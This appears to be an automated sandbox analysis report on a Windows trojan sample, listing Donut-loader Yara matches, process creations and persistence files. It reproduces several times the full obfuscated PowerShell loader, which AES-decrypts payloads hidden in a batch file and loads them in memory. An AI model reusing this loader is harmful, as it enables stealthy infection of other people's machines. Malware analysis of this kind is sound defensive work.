Source: powershell.exe, 00000004.00000002.2080347912.00000000065F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2037759383.0000000005918000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3266003264.0000000006BC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2179585394.0000000006006000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000B.00000002.3308756546.0000000008971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2232648300.000000000935E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2214765602.00000000081D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2223463037.00000000091DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\SysWOW64\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior
Source: C:\Windows\System32\wscript.exe	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}			Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_958.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('vgTuuGykaNIh9YHZdnC5Etwdm0+AKH40IGDiJn6heLQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gQ/PRzSPw/sfJ7E+XuUWrA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vdeGA=New-Object System.IO.MemoryStream(,$param_var); $adrDx=New-Object System.IO.MemoryStream; $Hvzlb=New-Object System.IO.Compression.GZipStream($vdeGA, [IO.Compression.CompressionMode]::Decompress); $Hvzlb.CopyTo($adrDx); $Hvzlb.Dispose(); $vdeGA.Dispose(); $adrDx.Dispose(); $adrDx.ToArray();}function execute_function($param_var,$param2_var){ $HMqcz=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ysWQp=$HMqcz.EntryPoint; $ysWQp.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_958.bat';$Hexfg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_958.bat').Split([Environment]::NewLine);foreach ($XqpWb in $Hexfg) { if ($XqpWb.StartsWith(':: ')) { $QgDIl=$XqpWb.Substring(3); break; }}$payloads_var=[string[]]$QgDIl.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A27AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00A27AAF

Detected potential crypto function

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A292C6	0_2_00A292C6
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A37DDC	0_2_00A37DDC
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A35011	0_2_00A35011
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A462A8	0_2_00A462A8
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A35282	0_2_00A35282
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A302F7	0_2_00A302F7
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A38253	0_2_00A38253
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A313FD	0_2_00A313FD
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A464D7	0_2_00A464D7
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A3742E	0_2_00A3742E
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A355B0	0_2_00A355B0
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A4E600	0_2_00A4E600
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A307A7	0_2_00A307A7
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A388AF	0_2_00A388AF
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2D833	0_2_00A2D833
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2395A	0_2_00A2395A
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A4EAAE	0_2_00A4EAAE
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A24A8E	0_2_00A24A8E
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A52BB4	0_2_00A52BB4
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A2FCCC	0_2_00A2FCCC
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: 0_2_00A22EB6	0_2_00A22EB6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E04BD0	4_2_06E04BD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E016CD	4_2_06E016CD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E01FAD	4_2_06E01FAD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E0304D	4_2_06E0304D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_06E031E7	4_2_06E031E7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02F4C550	5_2_02F4C550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02F4D6BD	5_2_02F4D6BD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02F4C528	5_2_02F4C528
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_02F49CD0	5_2_02F49CD0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_08616070	5_2_08616070
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_0861407A	5_2_0861407A

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: String function: 00A3FFD0 appears 56 times
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: String function: 00A407A0 appears 31 times
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe	Code function: String function: 00A3FEFC appears 42 times

Uses 32bit PE files

Source: jcgLYlM4dg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0000000B.00000002.3308756546.0000000008971000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2232648300.000000000935E000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2214765602.00000000081D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 0000000E.00000002.2223463037.00000000091DA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.5ffa728.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.70473c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.6f0f6e0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.powershell.exe.6fa73a0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.609a748.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.a6a0000.5.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 4.2.powershell.exe.5f826e8.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.powershell.exe.63e74a0.1.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.powershell.exe.634f7e0.0.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.powershell.exe.64874c0.2.raw.unpack, SdUDpawKkufvFwUCPBjE.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@25/15@1/1

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A27727 GetLastError,FormatMessageW,

0_2_00A27727

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Code function: 0_2_00A3B6D2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00A3B6D2

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\startup_str_958.vbs

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3808:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

File created: C:\Users\user\AppData\Local\Temp\RarSFX0

Jump to behavior

Source: C:\Users\user\Desktop\jcgLYlM4dg.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\Amadey.bat" "

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

